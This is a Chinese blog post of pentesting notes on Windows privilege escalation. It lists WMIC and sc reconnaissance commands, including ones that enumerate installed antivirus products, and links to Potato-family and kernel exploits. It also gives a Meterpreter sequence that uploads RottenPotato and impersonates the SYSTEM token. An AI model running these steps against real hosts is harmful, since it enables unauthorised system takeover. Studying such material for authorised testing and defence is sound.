windows提权

最新推荐文章于 2025-05-07 14:32:43 发布
最新推荐文章于 2025-05-07 14:32:43 发布
阅读量408 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 初学者常见问题
原文链接:http://note.youdao.com/noteshare?id=5e9c731c115fab7388da6272eacd55a9&sub=B6F437E3C44C4A6ABDF2CD04CEC0861B
本文详细介绍了Windows平台的信息收集工具WMIC及其应用,包括进程、服务、用户账户、网络接口等信息的提取。同时,列举了一系列用于提权的工具和脚本,如RottenPotato、JuicyPotato等,展示了如何利用这些工具进行本地提权至SYSTEM权限。此外,还分享了自动化信息收集脚本HIGS.bat和winPEAS.bat,帮助渗透测试人员进行系统信息的全面收集。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

windows-kernel-exploits(Windows平台提权漏洞集合):
https://github.com/SecWiki/windows-kernel-exploits

WMIC信息收集
WMIC:Windows管理工具命令行,提供了从命令行接口和批命令脚本执行系统管理的支持,对于信息收集和渗
透测试是非常实用的。
wmic信息提取脚本:wmic_info.bat
提取进程、服务、用户帐号、用户组、网络接口、硬盘信息、网络共享信息、安装Windows补丁、程序在启动运
行、安装的软件列表、操作系统、时区等信息。
补丁信息、补丁包过滤
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:“KBxxxxxx”

获取杀软名:
WMIC /Node:localhost /Namespace:\root\SecurityCenter2 Path AntiVirusProduct Get displayName
/Format:List
获取杀软名和安装路径:
WMIC /namespace:\root\securitycenter2 path antivirusproduct GET displayName,productState,
pathToSignedProductExe

wmic group
组帐户管理。
wmic os
已安装操作系统的管理。
wmic process
进程管理
wmic service
服务应用程序管理。
WMIC信息收集
02
Windows提权信息收集
wmic useraccount
用户帐户管理。
wmic startup
当用户登录到计算机系统时自动运行的命令的管理。
wmic nic
网络接口控制器(NIC)管理

03sc信息收集
SC:用来与服务控制管理器和服务进行通信的命令行程序,检索和设置有关服务的控制信息,测试和调试服务程
序,检索服务状态或运行、停止服务,类似于控制面板-管理工具-服务(services.msc)
获取系统注册服务信息:
sc query state= all

04自动信息收集
Host Information Gathering Script:HIGS.bat
https://github.com/myh0st/scripts/blob/master/Windows%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/HIGS.bat
privilege-escalation-awesome-scripts:winPEAS.bat
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASbat/winPEAS.bat
https://github.com/M4ximuss/Powerless
在这里插入图片描述

提权工具脚本
RottenPotato:
将服务帐户本地提权至SYSTEM
load incognito
list_tokens –u
upload /root/rottenpotato.exe .
execute -Hc -f rottenpotato.exe
impersonate_token “NT AUTHORITY\SYSTEM”
将SYSTEM token添加到impersonate user tokens下
在这里插入图片描述

Origin Potato :
https://github.com/foxglovesec/Potato
RottenPotato & JuicyPotato:
https://github.com/ohpe/juicy-potato
RoguePotato:
https://github.com/antonioCoco/RoguePotato
SweetPotato:
https://github.com/CCob/SweetPotato

https://github.com/uknowsec/SweetPotato
https://github.com/uknowsec/getSystem

[升] Windows — 系统内核溢出漏洞
Blue17 の 小窝
01-29 1244
注意:很容易让电脑蓝屏,所以如果是测试的话,前最好做好系统备份。溢出漏洞就像是往杯子里装水 —— 如果水太多,被子装不下了,就会溢出来。计算机中有个地方叫作缓存区。程序缓存区的大小是事先设置好的,如果用户输入数据的大小超过了缓存区的大小,程序就会溢出。系统内核溢出漏洞是一种通用的方法,攻击者通常可以使用该方法绕过系统的所有安全限制。攻击者利用该漏洞的关键是目标系统没有及时安装补丁—— 即使微已经针对某个漏洞发布了补丁,但如果系统没有立即安装补丁,就会让攻击者有机可乘。
windows总结
m0_52329625的博客
01-08 1403
自己总结学习的一些Windows思路,借鉴了许多网上公开的教程思路总结的一篇文章
转载:Windows总结
qq_43233085的博客
08-18 1094
转载:Windows总结简介按方法分类系统内核溢出漏洞系统配置错误令牌窃取无凭证条件下的升按系统类型类型Windows2000/2003、XPwindows 7/8、03/08、12/16常用系统漏洞CVE 简介 可分为纵向与横向: 纵向:低限角色获得高限角色的限; 横向获取同级别角色的限。 Windows常用的方法有:系统内核溢出漏洞、数据库、错误的系统配置、组策略首选项、WEB中间件漏洞、DLL劫持、滥用高危限令牌、第
Windows姿势
weixin_60719780的博客
03-19 1375
目录为什么Windows的常见方法的常用命令内核漏洞Vulmap【windows?查询下的MySQL版本,这里我的是5.7.26,是大于5.1版本的,也就是说,我们需要找到lib\plugin这个目录,然后将我们的udf.dll文件写进去,其实这里的目录需要我们自己创建。简单来说就是,我们通过web渗透方式将我们的payload传入到了目标机里,但是拿到webshell的限很低,有些事情是不能做的,所以我们需要进行限越大,我们做的事情也就越多了;要运行的二进制文件的位置在。
【亲测免费】 电脑系统信息登记/收集/资产管理工具
最新发布
gitblog_06791的博客
05-07 923
电脑系统信息登记/收集/资产管理工具 【下载地址】电脑系统信息登记收集资产管理工具 这款开源工具专为高效管理电脑资产而设计,能够自动收集并汇总详细的系统硬件信息,包括计算机名、操作系统、CPU、内存、硬盘、显卡等关键数据。支持客户端与服务端模式,用户可通过命令行灵活操作,如静默保存信息、指定IP发送数据等。它适用于各种网...
通过 WMIC 获取信息
Adminxe的博客
05-05 2409
0x00 前言 在获取 shell 之后,针对性的对 PC 的做免处理。这两条 wmic 的命令可以获取相关的信息。 0x01 命令 1. 获取名 WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List 2. 获取...
漏洞利用EXP windows-kernel-exploits-master.zip
03-10
本地溢出首先要有服务器的一个普通用户限,攻击者通常会向服务器上传本地溢出程序,在服务器端执行,如果系统存在漏洞,那么将溢出Administrator限。以下是不同系统的漏洞和相应的补丁。
Windows系统姿势
懂进攻知防守
08-11 5275
攻击者通过安全漏洞把获取到的受限制的低限用户突破限制,到高限的管理员用户,从而获得对整个系统得控制
windows 方式汇总
LINGX5的博客
08-25 1187
出发 NTLM 认证机制后,把流量包转到了 kali 主机的 135 端口上,再有 kali 主机上转给 windows 主机的 9999 端口,从而实现了。
windows-快速查找exp(第一课).docx
04-26
Windows与APT攻防】\n\n在网络安全领域,Windows系统的升(Privilege Escalation)是攻击者常用的手段之一,用于获取系统更高级别的访问限。本篇将详细讲解如何快速查找并利用公开的exploit(漏洞利用...
Windows
赤赤三的博客
03-20 1162
Windows密码安全性测试: 本地管理员密码如何直接取(能读取就直接读取,不能读取使用hash连接,实在不行就暴力破解): 直接通过mimikatz读取管理员密码: 使用Ophcrack破解系统Hash密码:https://ophcrack.sourceforge.io/tables.php 把这两个目录导入到kali自带工具里: 通过lazagne工具取密码: 读取本地计算机所有密码 ...
精品件工具--一款强大的内网信息收集工具,支持文件、文件夹、文件内容、命令、注册表、进程、mimikatz命令、dp.zip
02-07
精品件工具--一款强大的内网信息收集工具,支持文件、文件夹、文件内容、命令、注册表、进程、mimikatz命令、dp
系统件、硬件信息收集工具
02-05
运行本程序,可以收集windows电脑系统的、硬件信息,包括硬件详细配置、序列号等信息、还有本机安装的各种件信息。适用于winxp以上系统,运行时使用管理员限,结束后在C盘生成主机同名文件。
pentools:各种方便的渗透测试工具
05-30
铅笔工具 这个存储库只是我放置各种脚本和工具的转储场所,可以帮助我执行渗透测试和漏洞扫描。 其中一些有点酷,一些有点笨,但有时它们很方便。 我的主要目标是将代码在自己发现的地方有用,而不是放在自己的机器上,因为我倾向于频繁地进行重建,并且竭力确保保留所有废话,以便在完成后可以使用。 执照 我放在这里的所有内容都是在 GPL 下发布的。 (有关更多信息,请参见文件:COPYING。)如果您想贡献,请注意这一点,如果您愿意以相同的方式发布您的贡献,它将被添加。 问题/评论/示/请求 欢迎所有人,可以通过我的电子邮件地址发送给我:<algorythm>
shadowbrokers-exploits, 来自https的Shadowbrokers发行版的镜像.zip
09-17
shadowbrokers-exploits, 来自https的Shadowbrokers发行版的镜像 影子代理转储的镜像影子经纪人发布了一个新的转储,似乎包含 Windows 漏洞和操作记录。 我正在Github上镜像它,并将更新自述文件指向感兴趣的文件。原始网址:https://steemit.com/shadowbrokers/@
RoguePotato:从服务帐户到系统的另一次Windows本地特升级
03-11
盗贼土豆 从服务帐户到系统的另一次Windows本地特升级。 有关详细信息,请访问-> 用法 RoguePotato @splinter_code & @decoder_it Mandatory args: -r remote_ip: ip of the remote machine to use as redirector -e commandline: commandline of the program to launch Optional args: -l listening_port: This will run the RogueOxidResolver locally on the specified port -c {clsid}: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b
Windows-Exploit-Suggester(Windows辅助工具)(内网渗透&&配置&&使用)
weixin_44893706的博客
03-04 235
然后解压到python2.7目录中↓。
内网渗透:二、内网渗透的信息收集
liu_jia_liang的博客
02-18 1474
一、本机信息收集 1.1 查询网络配置信息 ipconfig /all 1.2查询本机的服务信息 wmic service list brief 查询系统信息 systeminfo 查询进程列表 tasklist: 查看服务进程ID wmic process list brief: 查看安装程序和版本信息 查看计划任务 schtasks /query /fo LIST /v 列出计划任务详细信息 1 查看主机开机时间 net statist...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值